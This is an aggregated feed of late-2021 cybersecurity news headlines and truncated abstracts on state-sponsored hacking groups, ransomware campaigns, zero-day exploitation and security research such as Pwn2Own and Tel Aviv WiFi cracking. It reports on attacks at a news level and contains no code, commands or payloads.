Cybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday released a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware. The threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC). The agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. criti... (The Hacker News)
November 17, 2021
Hackers Targeting Myanmar Use Domain Fronting to Hide Malicious Activities
Abstract
A malicious campaign has been found leveraging a technique called domain fronting to hide command-and-control traffic by leveraging a legitimate domain owned by the Myanmar government to route communications to an attacker-controlled server with the goal of evading detection. The threat, which was observed in September 2021, deployed Cobalt Strike payloads as a stepping stone for launching further attacks, with the adversary using a domain associated with the Myanmar Digital News network, a state-owned digital newspaper, as a front for their Beacons. "When the Beacon is launched, it will submit a DNS request for a legitimate high-reputation domain hosted behind Cloudflare infrastructure and modify the subsequent HTTPs requests header to instruct the CDN to direct the traffic to an attacker-controlled host," Cisco Talos researchers Chetan Raghuprasad, Vanja Svajcer, and Asheer Malhotra said in a technical analysis published Tuesday. Originally released in 2012 to addres... (The Hacker News)
November 17, 2021
Threat actors offer millions for zero-days, developers talk of exploit-as-a-service
Abstract
While mostly hidden in private conversations, details sometimes emerge about the parallel economy of vulnerability exploits on underground forums, revealing just how fat of a wallet some threat actors have. (BleepingComputer)
November 16, 2021
Facebook disrupts Pakistani hacking group targeting Afghan users
Abstract
Facebook on Tuesday said it had taken steps to disrupt a group of hackers based in Pakistan that had been using the platform to target former members of the Afghan government and others based in Afghanistan amid the government collapse earlier this year. (The Hill)
November 16, 2021
Microsoft warns of the evolution of six Iranian hacking groups
Abstract
The Microsoft Threat Intelligence Center (MSTIC) has presented an analysis of the evolution of several Iranian threat actors at CyberWarCon 2021, and its findings show increasingly sophisticated attacks. (BleepingComputer)
November 16, 2021
How Attackers Exploit the Remote Desktop Protocol
Abstract
The Remote Desktop Protocol (RDP) is one of the most popular communication protocols for remotely controlling systems. It didn't take long before attackers realized this is a golden egg. (Security Intelligence)
November 15, 2021
New ‘Moses Staff’ Hacker Group Targets Israeli Companies With Destructive Attacks
Abstract
A new politically-motivated hacker group named "Moses Staff" has been linked to a wave of targeted attacks against Israeli organizations since September 2021 with the goal of plundering and leaking sensitive information prior to encrypting their networks, with no option to regain access or negotiate a ransom. "The group openly states that their motivation in attacking Israeli companies is to cause damage by leaking the stolen sensitive data and encrypting the victim's networks, with no ransom demand," Check Point Research said in a report published Monday. "In the language of the attackers, their purpose is to 'Fight against the resistance and expose the crimes of the Zionists in the occupied territories.'" At least 16 victims have had their data leaked to date, according to stats released by the collective. The threat actor is said to leverage publicly known vulnerabilities as a means to breach enterprise servers and gain initial ac... (The Hacker News)
November 15, 2021
Researchers Demonstrate New Fingerprinting Attack on Tor Encrypted Traffic
Abstract
A new analysis of website fingerprinting (WF) attacks aimed at the Tor web browser has revealed that it's possible for an adversary to glean a website frequented by a victim, but only in scenarios where the threat actor is interested in a specific subset of the websites visited by users. "While attacks can exceed 95% accuracy when monitoring a small set of five popular websites, indiscriminate (non-targeted) attacks against sets of 25 and 100 websites fail to exceed an accuracy of 80% and 60%, respectively," researchers Giovanni Cherubin, Rob Jansen, and Carmela Troncoso said in a newly published paper. Tor browser offers "unlinkable communication" to its users by routing internet traffic through an overlay network, consisting of more than six thousand relays, with the goal of anonymizing the originating location and usage from third parties conducting network surveillance or traffic analysis. It achieves this by building a circuit that traverses via an... (The Hacker News)
November 15, 2021
North Korean Hackers Target Cybersecurity Researchers with Trojanized IDA Pro
Abstract
Lazarus, the North Korea-affiliated state-sponsored group, is attempting to once again target security researchers with backdoors and remote access trojans using a trojanized pirated version of the popular IDA Pro reverse engineering software. The findings were reported by ESET security researcher Anton Cherepanov last week in a series of tweets. IDA Pro is an Interactive Disassembler that's designed to translate machine language (aka executables) into assembly language, enabling security researchers to analyze the inner workings of a program (malicious or otherwise) as well as function as a debugger to detect errors. "Attackers bundled the original IDA Pro 7.5 software developed by [Hex-Rays] with two malicious components," the Slovak cybersecurity firm said, one of which is an internal module called "win_fw.dll" that's executed during installation of the application. This tampered version is then orchestrated to load a second component named... (The Hacker News)
November 15, 2021
Hackers are Exploiting Zero-Day Flaw in macOS: Google Warns
Abstract
Google observed that hackers were using a watering hole attack. In this attack, the websites targeted are typically selected by the attackers based on the profile of their visitors. (Cyware Alerts - Hacker News)
November 15, 2021
North Korea-linked Lazarus group targets cybersecurity experts with Trojanized IDA Pro
Abstract
North Korea-linked APT Lazarus targets security researchers using a trojanized pirated version of the popular IDA Pro reverse engineering software. ESET researchers reported that the North Korea-linked Lazarus APT group is targeting cyber security... (Security Affairs)
November 12, 2021
Hackers Increasingly Using HTML Smuggling in Malware and Phishing Attacks
Abstract
Threat actors are increasingly banking on the technique of HTML smuggling in phishing campaigns as a means to gain initial access and deploy an array of threats, including banking malware, remote administration trojans (RATs), and ransomware payloads. Microsoft 365 Defender Threat Intelligence Team, in a new report published Thursday, disclosed that it identified infiltrations distributing the Mekotio banking Trojan, backdoors such as AsyncRAT and NjRAT, and the infamous TrickBot malware. The multi-staged attacks — dubbed ISOMorph — were also publicly documented by Menlo Security in July 2021. HTML smuggling is an approach that allows an attacker to "smuggle" first-stage droppers, often encoded malicious scripts embedded within specially crafted HTML attachments or web pages, onto a victim machine by taking advantage of basic features in HTML5 and JavaScript rather than exploiting a vulnerability or a design flaw in modern web browsers. By doing so, it enables t... (The Hacker News)
November 12, 2021
These are the top-level domains threat actors like the most
Abstract
Out of over a thousand top-level domain choices, cyber-criminals and threat actors prefer a small set of 25, which accounts for 90% of all malicious sites. (BleepingComputer)
November 11, 2021
Hackers Exploit macOS Zero-Day to Hack Hong Kong Users with new Implant
Abstract
Google researchers on Thursday disclosed that it found a watering hole attack in late August exploiting a now-patched zero-day in the macOS operating system and targeting Hong Kong websites related to a media outlet and a prominent pro-democracy labor and political group to deliver a never-before-seen backdoor on compromised machines. "Based on our findings, we believe this threat actor to be a well-resourced group, likely state backed, with access to their own software engineering team based on the quality of the payload code," Google Threat Analysis Group (TAG) researcher Erye Hernandez said in a report. Tracked as CVE-2021-30869 (CVSS score: 7.8), the security shortcoming concerns a type confusion vulnerability affecting the XNU kernel component that could cause a malicious application to execute arbitrary code with the highest privileges. Apple addressed the issue on September 23. The attacks observed by TAG involved an exploit chain that strung together CVE-2021... (The Hacker News)
November 11, 2021
Three Threat Groups Found Interconnected to a Common Broker
Abstract
BlackBerry discovered that actors behind MountLocker, Phobos, and the StrongPity APT are dependent on a common initial access broker, dubbed Zebra2104, for their malware campaigns. The broker has helped criminals break into the networks of multiple firms in Australia and Turkey. Such collabo... (Cyware Alerts - Hacker News)
November 11, 2021
Researchers Uncover Hacker-for-Hire Group That’s Active Since 2015
Abstract
A new cyber mercenary hacker-for-hire group dubbed "Void Balaur" has been linked to a string of cyberespionage and data theft activities targeting thousands of entities as well as human rights activists, politicians, and government officials around the world at least since 2015 for financial gain while lurking in the shadows. Named after a many-headed dragon from Romanian folklore, the adversary has been unmasked advertising its services in Russian-speaking underground forums dating all the way back to 2017 and selling troves of sensitive information such as cell tower phone logs, passenger flight records, credit reports, banking data, SMS messages, and passport details. The threat actor calls itself "Rockethack." "This hacker-for-hire group does not operate out of a physical building, nor does it have a shiny prospectus that describes its services," Trend Micro researcher Feike Hacquebord said in a newly published profile of the collective. ... (The Hacker News)
November 11, 2021
Hackers undetected on Queensland water supplier server for 9 months
Abstract
Hackers stayed hidden for nine months on a server holding customer information for a Queensland water supplier, illustrating the need for better cyberdefenses for critical infrastructure. (BleepingComputer)
November 11, 2021
Iran’s Lyceum Hackers Target Telecoms, ISPs in Israel, Saudi Arabia, and Africa
Abstract
A state-sponsored threat actor allegedly affiliated with Iran has been linked to a series of targeted attacks aimed at internet service providers (ISPs) and telecommunication operators in Israel, Morocco, Tunisia, and Saudi Arabia, as well as a ministry of foreign affairs (MFA) in Africa, new findings reveal. The intrusions, staged by a group tracked as Lyceum, are believed to have occurred between July and October 2021, researchers from Accenture Cyber Threat Intelligence (ACTI) group and Prevailion's Adversarial Counterintelligence Team (PACT) said in a technical report. The names of the victims were not disclosed. The latest revelations throw light on the web-based infrastructure used by Lyceum, over 20 of them, enabling the identification of "additional victims and provide further visibility into Lyceum's targeting methodology," the researchers noted, adding "at least two of the identified compromises are assessed to be ongoing despite prior public discl... (The Hacker News)
November 11, 2021
TeamTNT Uses New Sophisticated Techniques Against Docker Systems
Abstract
The TeamTNT group has upped its game in recent times. Recently, it was found targeting Docker servers exposing Docker REST APIs for cryptomining purposes, under a campaign that was set off in October. Experts surmise that the threat actor could launch a larger-scale attack in the near future. (Cyware Alerts - Hacker News)
November 11, 2021
North Korean Hacker Group Uses Malicious Blogs to Deliver Malware to High-Profile Targets
Abstract
This campaign targets South Korea-based think tanks whose research focuses on political, diplomatic, and military topics pertaining to North Korea, China, Russia, and the U.S. (Cisco Talos)
November 10, 2021
Void Balaur hackers-for-hire sell stolen mailboxes and private data
Abstract
A hacker-for-hire group called Void Balaur has been stealing emails and highly sensitive information for more than five years, selling it to customers with both financial and espionage goals. (BleepingComputer)
November 10, 2021
FBI warns of Iranian hackers looking to buy US orgs’ stolen data
Abstract
The Federal Bureau of Investigation (FBI) warned private industry partners of attempts by an Iranian threat actor to buy stolen information regarding US and worldwide organizations. (BleepingComputer)
November 10, 2021
Gamaredon Threat Group Allegedly Linked to Russia
Abstract
Ukraine agencies disclosed the details, including the real names, of the members of the Gamaredon group and linked its activities with Russia's FSB. According to the report, the group allegedly carried out around 5,000 cyberattacks against Ukraine and attempted to target over 1,500 government... (Cyware Alerts - Hacker News)
November 10, 2021
Lazarus hackers target researchers with trojanized IDA Pro
Abstract
A North Korean state-sponsored hacking group known as Lazarus is again trying to hack security researchers, this time with a trojanized pirated version of the popular IDA Pro reverse engineering application. (BleepingComputer)
November 10, 2021
Russian Hackers Hid Behind American Home Networks
Abstract
Residential proxies allowed the attackers to pass their internet traffic via a home user. This makes the traffic appear to have originated from a residential broadband customer in the U.S. instead of somewhere else, such as Eastern Europe. (Cyware Alerts - Hacker News)
November 10, 2021
TeamTNT group targets poorly configured Docker servers exposing REST APIs
Abstract
TeamTNT hackers are targeting poorly configured Docker servers as part of an ongoing campaign that started in October. Trend Micro researchers reported that TeamTNT hackers are targeting poorly configured Docker servers exposing Docker REST APIs as part... (Security Affairs)
November 09, 2021
TeamTNT hackers target your poorly configured Docker servers
Abstract
Poorly configured Docker servers are being actively targeted by the TeamTNT hacking group in an ongoing campaign that started last month. (BleepingComputer)
November 9, 2021
New Threat Group Exploits Zoho Flaws in U.S. Orgs
Abstract
Palo Alto Networks discovered that Emissary Panda, a hacking group with ties to China, is exploiting Zoho software flaws in the networks of at least nine organizations in the defense, energy, technology, healthcare, and education sectors. The attackers were using malicious tools for credentials ha... (Cyware Alerts - Hacker News)
November 09, 2021
Iranian state hackers use upgraded malware in attacks on ISPs, telcos
Abstract
The Iranian state-supported APT known as 'Lyceum' (Hexane, Spilrin) targeted ISPs and telecommunication service providers in the Middle East and Africa between July and October 2021. (BleepingComputer)
November 9, 2021
Lyceum Threat Group Targeting Telecom Companies, ISPs in Israel, Morocco, Tunisia, and Saudi Arabia
Abstract
According to a new report, between July and October this year, Lyceum was spotted in attacks against ISPs and telecoms organizations across Israel, Morocco, Tunisia, and Saudi Arabia. (ZDNet)
November 8, 2021
Tortilla Gang Abusing ProxyShell Vulnerabilities to Spread Babuk
Abstract
Cisco Talos red-flagged a new campaign by Tortilla, one of Babuk’s affiliates, for targeting ProxyShell flaws in Exchange Server in an attempt to breach corporate networks. The gang asks for around $10,000 ransom in Monero to decrypt the encrypted documents. More similar attacks are expected in t... (Cyware Alerts - Hacker News)
November 08, 2021
International coalition arrests hackers linked to thousands of ransomware attacks
Abstract
Romanian authorities have arrested two individuals they say are linked to the use of REvil ransomware as part of a prolific hacking group tied to attacks on several major American companies in recent months. (The Hill)
November 08, 2021
BlackBerry Uncovers Initial Access Broker Linked to 3 Distinct Hacker Groups
Abstract
A previously undocumented initial access broker has been unmasked as providing entry points to three different threat actors for mounting intrusions that range from financially motivated ransomware attacks to phishing campaigns. BlackBerry's research and intelligence team dubbed the entity "Zebra2104," with the group responsible for offering a means of a digital approach to ransomware syndicates such as MountLocker and Phobos, as well as the advanced persistent threat (APT) tracked under the moniker StrongPity (aka Promethium). The threat landscape as we know it has been increasingly dominated by a category of players known as the initial access brokers (IABs), who are known to provide other cyber-criminal groups, including ransomware affiliates, with a foothold to an infinite pool of potential organizations belonging to diverse geographies and sectors via persistent backdoors into the victim networks, effectively building a pricing model for remote access. ... (The Hacker News)
November 8, 2021
Nation-state actors target critical sectors by exploiting the CVE-2021-40539 flaw
Abstract
Experts warn of an ongoing hacking campaign that already compromised at least nine organizations worldwide from critical sectors by exploiting CVE-2021-40539. Cybersecurity experts from Palo Alto Networks warn of an ongoing cyberespionage campaign... (Security Affairs)
November 6, 2021
White hat hackers earn over $1 Million at Pwn2Own Austin 2021
Abstract
The Zero Day Initiative’s Pwn2Own Austin 2021 hacking contest has ended, and participants earned $1,081,250 for 61 zero-day flaws. Trend Micro's Zero Day Initiative’s Pwn2Own Austin 2021 hacking contest has ended; the participants earned a total... (Security Affairs)
November 05, 2021
Ukraine Identifies Russian FSB Officers Hacking As Gamaredon Group
Abstract
Ukraine's premier law enforcement and counterintelligence agency on Thursday disclosed the real identities of five individuals allegedly involved in cyberattacks attributed to a cyber-espionage group named Gamaredon, linking the members to Russia's Federal Security Service (FSB). Calling the hacker group "an FSB special project, which specifically targeted Ukraine," the Security Service of Ukraine (SSU) said the perpetrators "are officers of the 'Crimean' FSB and traitors who defected to the enemy during the occupation of the peninsula in 2014." The names of the five individuals the SSU alleges are part of the covert operation are Sklianko Oleksandr Mykolaiovych, Chernykh Mykola Serhiiovych, Starchenko Anton Oleksandrovych, Miroshnychenko Oleksandr Valeriiovych, and Sushchenko Oleh Oleksandrovych. Since its inception in 2013, the Russia-linked Gamaredon group (aka Primitive Bear, Armageddon, Winterflounder, or Iron Tilden) has been responsi... (The Hacker News)
November 05, 2021
Pwn2Own: Printer plays AC/DC, Samsung Galaxy S21 hacked twice
Abstract
Trend Micro's ZDI has awarded $1,081,250 for 61 zero-days exploited at Pwn2Own Austin 2021, with competitors successfully pwning the Samsung Galaxy S21 again and hacking an HP LaserJet printer to play AC/DC's Thunderstruck on the contest's third day. (BleepingComputer)
November 5, 2021
Threat actor exploits MS ProxyShell flaws to deploy Babuk ransomware
Abstract
Talos researchers warn of a new threat actor that is hacking Microsoft Exchange servers by exploiting ProxyShell flaws to gain access to corporate networks and deploy the Babuk ransomware. (Security Affairs)
November 4, 2021
Hacker allegedly involved in 2020 Twitter hack charged with theft of $784K in crypto
Abstract
The US DoJ charged the suspected Twitter hacker 'PlugWalkJoe' with the theft of $784,000 worth of cryptocurrency using SIM swap attacks. The US Department of Justice has indicted Joseph James O'Connor, a suspected Twitter hacker also known as 'PlugWalkJoe,'... (Security Affairs)
November 04, 2021
Ukraine links members of Gamaredon hacker group to Russian FSB
Abstract
SSU and the Ukrainian secret service say they have identified five members of the Gamaredon hacking group, a Russian state-sponsored operation known for targeting Ukraine since 2014. (BleepingComputer)
November 3, 2021
Attackers Exploiting Google Chrome on Windows 10 for UAC Bypass
Abstract
Rapid7 unearthed a malicious campaign targeting Chrome browsers running on Windows 10. The objective of the campaign is to obtain sensitive data and steal cryptocurrency from the infected systems. Experts recommend avoiding visiting unknown sites and clicking on suspicious links. (Cyware Alerts - Hacker News)
November 03, 2021
Commerce Department blacklists four groups linked to cyber surveillance operations
Abstract
The Commerce Department on Wednesday added four organizations linked to cyber surveillance operations, including the Israeli company NSO Group, to its “entity list,” effectively blacklisting them. (The Hill)
November 03, 2021
Sonos, HP, and Canon devices hacked at Pwn2Own Austin 2021
Abstract
During the first day of Pwn2Own Austin 2021, contestants won $362,500 after exploiting previously unknown security flaws to hack printers, routers, NAS devices, and speakers from Canon, HP, Western Digital, Cisco, Sonos, TP-Link, and NETGEAR. (BleepingComputer)
November 2, 2021
TA2722 Impersonates Philippine Government to Lure Victims
Abstract
Balikbayan Foxes, aka TA2722, a new highly sophisticated threat actor, has been found targeting organizations globally by impersonating the Philippine government and businesses. All the campaigns were found distributing Remcos or NanoCore RATs. Security professionals and organizations are recommended to tr... (Cyware Alerts - Hacker News)
November 02, 2021
Google to Pay Hackers $31,337 for Exploiting Patched Linux Kernel Flaws
Abstract
Google on Monday announced that it will pay security researchers to find exploits using vulnerabilities, previously remediated or otherwise, over the next three months as part of a new bug bounty program to improve the security of the Linux kernel. To that end, the company is expected to issue rewards worth $31,337 for exploiting privilege escalation in a lab environment for each patched vulnerability, an amount that can climb up to $50,337 for working exploits that take advantage of zero-day flaws in the kernel and other undocumented attack techniques. Specifically, the program aims to uncover attacks that could be launched against Kubernetes-based infrastructure to defeat process isolation barriers (via NSJail) and break out of the sandbox to leak secret information. The program is expected to last until January 31, 2022. "It is important to note, that the easiest exploitation primitives are not available in our lab environment due to the hardening done on Container-Opti... (The Hacker News)
November 1, 2021
How to hack Wincor Cineo ATMs to bypass black-box attack protections and withdraw cash
Abstract
Researchers demonstrated how crooks could hack Diebold Nixdorf's Wincor Cineo ATMs to bypass black-box attack protections and withdraw cash. Positive Technologies researchers Vladimir Kononovich and Alexey Stennikov have discovered security flaws... (Security Affairs)
November 1, 2021
Balikbayan Foxes group spoofs Philippine gov to spread RATs
Abstract
Meet Balikbayan Foxes: a threat group impersonating the Philippine gov't. Experts uncovered a new threat actor, tracked as Balikbayan Foxes, that is impersonating the Philippine government to spread malware. Researchers from Proofpoint have uncovered... (Security Affairs)
October 28, 2021
Israeli Researcher Cracked Over 3500 Wi-Fi Networks in Tel Aviv City
Abstract
Over 70% of Wi-Fi networks from a sample size of 5,000 were hacked with "relative ease" in the Israeli city of Tel Aviv, highlighting how unsecure Wi-Fi passwords can become a gateway for serious threats to individuals, small businesses, and enterprises alike. CyberArk security researcher Ido Hoorvitch, who used Wi-Fi sniffing equipment costing about $50 to collect 5,000 network hashes for the study, said "the process of sniffing Wi-Fis and the subsequent cracking procedures was a very accessible undertaking in terms of equipment, costs and execution." The new Wi-Fi attack builds on previous findings by Jens "atom" Steube in 2018 that involves capturing what's called the PMKIDs associated with a client (aka SSID) in order to attempt a brute-force attack using password recovery tools like hashcat. PMKID is a unique key identifier used by the access point (AP) to keep track of the pre-shared key — i.e., pairwise master key aka PMK — being u... (The Hacker News)
October 28, 2021
Alleged Russian hacker extradited from South Korea to stand trial in US
Abstract
An alleged Russian hacker appeared in court for the first time Thursday to face allegations that he played a role in a transnational cybercrime organization after being extradited to the United States from South Korea. (The Hill)
October 27, 2021
TA551 Using Sliver Red-Teaming Tool to Penetrate Networks
Abstract
TA551 has been found targeting victims by email thread hijacking using a red-teaming toolkit and adversary simulation framework called Sliver. Experts revealed that the attackers have been using this technique since October 20. The use of open-source pentest tools is becoming more popular... (Cyware Alerts - Hacker News)
October 27, 2021
Attack the block – How a security researcher cracked 70% of urban WiFi networks in one hit
Abstract
A vulnerability, discovered by Hashcat’s lead developer Jens “atom” Steube, is at the heart of the attack. This bug can be exploited to retrieve PMKID hashes to crack network passwords. (The Daily Swig)
October 26, 2021
Gummy Browsers Attack Lets Hackers Spoof Your Digital Identity
Abstract
Researchers at Texas A&M University and the University of Florida discovered Gummy Browsers, a new fingerprint capturing and browser spoofing attack. This attack technique can be leveraged to bypass 2FA on auth systems. While security analysts and experts will work toward addressing such... (Cyware Alerts - Hacker News)
October 26, 2021
Expert managed to crack 70% of a 5,000 WiFi network sample in Tel Aviv
Abstract
A researcher from the security firm CyberArk has managed to crack 70% of Tel Aviv’s WiFi networks starting from a sample of 5,000 gathered WiFi networks. CyberArk security researcher Ido Hoorvitch demonstrated how it is possible to crack WiFi at scale by exploiting... (Security Affairs)
October 26, 2021
North Korean state hackers start targeting the IT supply chain
Abstract
North Korean-sponsored Lazarus hacking group has switched focus on new targets and was observed by Kaspersky security researchers expanding its supply chain attack capabilities. (BleepingComputer)
October 26, 2021
Researcher cracked 70% of WiFi networks sampled in Tel Aviv
Abstract
A researcher has managed to crack 70% of a 5,000 WiFi network sample in his hometown, Tel Aviv, to prove that home networks are severely unsecured and easy to hijack. (BleepingComputer)
October 25, 2021
Microsoft Warns of Continued Supply-Chain Attacks by the Nobelium Hacker Group
Abstract
Nobelium, the threat actor behind the SolarWinds compromise in December 2020, has been behind a new wave of attacks that compromised 14 downstream customers of multiple cloud service providers (CSP), managed service providers (MSP), and other IT services organizations, illustrating the adversary's continuing interest in targeting the supply chain via the "compromise-one-to-compromise-many" approach. Microsoft, which disclosed details of the campaign on Monday, said it notified more than 140 resellers and technology service providers since May. Between July 1 and October 19, 2021, Nobelium is said to have singled out 609 customers, who were collectively attacked a grand total of 22,868 times. "This recent activity is another indicator that Russia is trying to gain long-term, systematic access to a variety of points in the technology supply chain and establish a mechanism for surveilling – now or in the future – targets of interest to the Russian government,"... (The Hacker News)
October 25, 2021
Hackers used billing software zero-day to deploy ransomware
Abstract
An unknown ransomware group is exploiting a critical SQL injection bug found in the BillQuick Web Suite time and billing solution to deploy ransomware on their targets' networks in ongoing attacks. (BleepingComputer)
October 25, 2021
Hackers Exploited Popular BillQuick Billing Software to Deploy Ransomware Full Text
Abstract
Cybersecurity researchers on Friday disclosed a now-patched critical vulnerability in multiple versions of a time and billing system called BillQuick that's being actively exploited by threat actors to deploy ransomware on vulnerable systems. CVE-2021-42258, as the flaw is being tracked, concerns an SQL-based injection attack that allows for remote code execution and was successfully leveraged to gain initial access to an unnamed U.S. engineering company and mount a ransomware attack, American cybersecurity firm Huntress Labs said. While the issue has been addressed by BQE Software, eight other undisclosed security issues that were identified as part of the investigation are yet to be patched. According to its website, BQE Software's products are used by 400,000 users worldwide. "Hackers can use this to access customers' BillQuick data and run malicious commands on their on-premises Windows servers," Huntress Labs threat researcher Caleb Stewart saThe Hacker News
October 22, 2021
Hackers Set Up Fake Company to Get IT Experts to Launch Ransomware Attacks Full Text
Abstract
The financially motivated FIN7 cybercrime gang has masqueraded as yet another fictitious cybersecurity company called "Bastion Secure" to recruit unwitting software engineers under the guise of penetration testing in a likely lead-up to a ransomware scheme. "With FIN7's latest fake company, the criminal group leveraged true, publicly available information from various legitimate cybersecurity companies to create a thin veil of legitimacy around Bastion Secure," Recorded Future's Gemini Advisory unit said in a report. "FIN7 is adopting disinformation tactics so that if a potential hire or interested party were to fact check Bastion Secure, then a cursory search on Google would return 'true' information for companies with a similar name or industry to FIN7's Bastion Secure." FIN7, also known as Carbanak, Carbon Spider, and Anunak, has a track record of striking restaurant, gambling, and hospitality industries in the U.S. to infectThe Hacker News
October 21, 2021
Hacking group tied to Colonial Pipeline attack continuing to recruit tech talent Full Text
Abstract
A hacking group linked to the ransomware attack on Colonial Pipeline earlier this year is posing as a fake company to recruit individuals to help carry out further attacks, according to a report published Thursday.The Hill
October 21, 2021
Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts Full Text
Abstract
Since at least late 2019, a network of hackers-for-hire has been hijacking the channels of YouTube creators, luring them with bogus collaboration opportunities to broadcast cryptocurrency scams or sell the accounts to the highest bidder. That's according to a new report published by Google's Threat Analysis Group (TAG), which said it disrupted financially motivated phishing campaigns targeting the video platform with cookie theft malware. The actors behind the infiltration have been attributed to a group of hackers recruited in a Russian-speaking forum. "Cookie Theft, also known as 'pass-the-cookie attack,' is a session hijacking technique that enables access to user accounts with session cookies stored in the browser," TAG's Ashley Shen said. "While the technique has been around for decades, its resurgence as a top security risk could be due to a wider adoption of multi-factor authentication (MFA) making it difficult to conduct abuse, and shifThe Hacker News
October 20, 2021
Google Crushes YouTube Cookie-Stealing Channel Hijackers Full Text
Abstract
Google has caught and brushed off a bunch of cookie-stealing YouTube channel hijackers who were running cryptocurrency scams on, or auctioning off, ripped-off channels.Threatpost
October 20, 2021
Researchers Break Intel SGX With New ‘SmashEx’ CPU Attack Technique Full Text
Abstract
A newly disclosed vulnerability affecting Intel processors could be abused by an adversary to gain access to sensitive information stored within enclaves and even run arbitrary code on vulnerable systems. The vulnerability (CVE-2021-0186, CVSS score: 8.2) was discovered by a group of academics from ETH Zurich, the National University of Singapore, and the Chinese National University of Defense Technology in early May 2021, who used it to stage a confidential data disclosure attack called "SmashEx" that can corrupt private data housed in the enclave and break its integrity. Introduced with Intel's Skylake processors, SGX (short for Software Guard eXtensions) allows developers to run selected application modules in a completely isolated secure compartment of memory, called an enclave or a Trusted Execution Environment (TEE), which is designed to be protected from processes running at higher privilege levels like the operating system. SGX ensures that data is secureThe Hacker News
October 20, 2021
Major Russian hacking group linked to ransomware attack on Sinclair: report Full Text
Abstract
A well-known Russian hacking group previously sanctioned by the United States is behind the crippling ransomware attack on Sinclair Broadcast Group that is continuing to impact news stations across the country, according to a new report.The Hill
October 20, 2021
China-linked LightBasin group accessed calling records from telcos worldwide Full Text
Abstract
The China-linked cyberespionage group LightBasin (aka UNC1945) hacked mobile telephone networks around the world and used specialized tools to access calling records.Security Affairs
October 20, 2021
Hackers are Disguising Malicious JavaScript Code Using Packers to Bypass Signature-based Detection Systems Full Text
Abstract
Packers work by compressing or encrypting code to make that code unreadable and non-debuggable — resulting in 'obfuscated' code that is difficult for antivirus to detect.ZDNet
October 19, 2021
Potential Chinese hackers targeting telecommunications companies Full Text
Abstract
Hackers potentially linked to China are continuously targeting the telecommunications sector, a report released Tuesday by cybersecurity company CrowdStrike found.The Hill
October 19, 2021
Symantec uncovered a previously unknown nation-state actor, named Harvester, that targeted telcos Full Text
Abstract
Symantec spotted a previously unknown nation-state actor, tracked as Harvester, that is targeting telecommunication providers and IT firms in South Asia.Security Affairs
October 18, 2021
Cybersecurity Experts Warn of a Rise in Lyceum Hacker Group Activities in Tunisia Full Text
Abstract
A threat actor, previously known for striking organizations in the energy and telecommunications sectors across the Middle East as early as April 2018, has evolved its malware arsenal to strike two entities in Tunisia. Security researchers at Kaspersky, who presented their findings at the VirusBulletin VB2021 conference earlier this month, attributed the attacks to a group tracked as Lyceum (aka Hexane), which was first publicly documented in 2019 by Secureworks. "The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies," researchers Aseel Kayal, Mark Lechtik, and Paul Rascagneres detailed. "Based on the targeted industries, we assume that the attackers might have been interested in compromising such entities to track the movements and communications of individuals of interest to them." Analysis of the threat actor's toolset has shown that the attacks have shifted from leveraging a combinatThe Hacker News
October 18, 2021
How Attackers Used Math Symbols to Evade Detection Full Text
Abstract
Experts reported a phishing attempt targeted at Verizon that involves the use of mathematical symbols to bypass anti-phishing systems to acquire users’ Office 365 credentials. The spoofed messages pretend to be a voicemail notification with an embedded Play button. The recent campaign reflects how ...Cyware Alerts - Hacker News
October 18, 2021
TeamTNT Deploys Malicious Docker Image On Docker Hub Full Text
Abstract
The Uptycs Threat Research Team spotted a campaign in which the TeamTNT threat actors deployed a malicious container image on Docker Hub.Security Affairs
October 18, 2021
Chinese Actors Use MysterySnail RAT to Exploit Windows Zero-day Full Text
Abstract
Kaspersky unearthed a cyberespionage campaign exploiting a zero-day flaw in Windows to deliver MysterySnail malware and steal data. A connection to a Chinese-speaking APT was also established. Experts recommend organizations stay proactive and ready with adequate security measures.Cyware Alerts - Hacker News
October 18, 2021
U.S. and Israeli Defense Tech Firms Targeted by Iranian Actors Full Text
Abstract
Iran-linked hackers were found conducting extensive password spraying attacks against Office 365 accounts of defense technology and global maritime firms in the U.S. and Israel. The group attempts to gain access to commercial satellite imagery and proprietary shipping plans/logs. Microsoft notifie ...Cyware Alerts - Hacker News
October 17, 2021
Experts hacked a fully patched iOS 15 running on iPhone 13 at China’s Tianfu Cup hacking contest Full Text
Abstract
White hat hackers earned $1.88 million at the Tianfu Cup, the most important hacking contest held in China, by demonstrating vulnerabilities in popular software.Security Affairs
October 16, 2021
Researchers Disclose New Side-Channel Attacks Affecting All AMD CPUs Full Text
Abstract
Researchers have disclosed the details of new timing and power-based side-channel attacks that affect all CPUs made by AMD, but the chipmaker says no new mitigations are necessary.Security Week
October 14, 2021
Google: We’re Tracking 270 State-Sponsored Hacker Groups From Over 50 Countries Full Text
Abstract
Google's Threat Analysis Group (TAG) on Thursday said it's tracking more than 270 government-backed threat actors from more than 50 countries, adding it has sent approximately 50,000 alerts of state-sponsored phishing or malware attempts to customers since the start of 2021. The warnings mark a 33% increase from 2020, the internet giant said, with the spike largely stemming from "blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear." Additionally, Google said it disrupted a number of campaigns mounted by an Iranian state-sponsored attacker group tracked as APT35 (aka Charming Kitten, Phosphorous, or Newscaster), including a sophisticated social engineering attack dubbed "Operation SpoofedScholars" aimed at think tanks, journalists, and professors with an aim to solicit sensitive information by masquerading as scholars with the University of London's School of Oriental and African Studies (SOAS). Details of thThe Hacker News
October 12, 2021
Chinese hackers use Windows zero-day to attack defense, IT firms Full Text
Abstract
A Chinese-speaking hacking group exploited a zero-day vulnerability in the Windows Win32k kernel driver to deploy a previously unknown remote access trojan (RAT).BleepingComputer
October 12, 2021
SnapMC hackers skip file encryption and just steal your files Full Text
Abstract
A new actor tracked as SnapMC has emerged in the cybercrime space, performing the typical data-stealing extortion that underpins ransomware operations, but without doing any file encryption.BleepingComputer
October 11, 2021
